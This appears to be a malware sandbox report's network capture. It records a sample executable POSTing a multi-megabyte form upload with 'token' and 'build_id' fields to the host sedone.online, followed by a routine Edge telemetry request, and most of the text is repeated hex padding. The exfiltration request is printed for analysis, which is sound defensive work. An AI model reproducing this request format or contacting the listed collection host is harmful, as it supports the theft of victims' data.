                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.749910116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 6990993
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------R90RQ9HL6P8YU3ECJMOPCont
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.74987320.110.205.1194435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:18 UTC1175OUTGET /c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
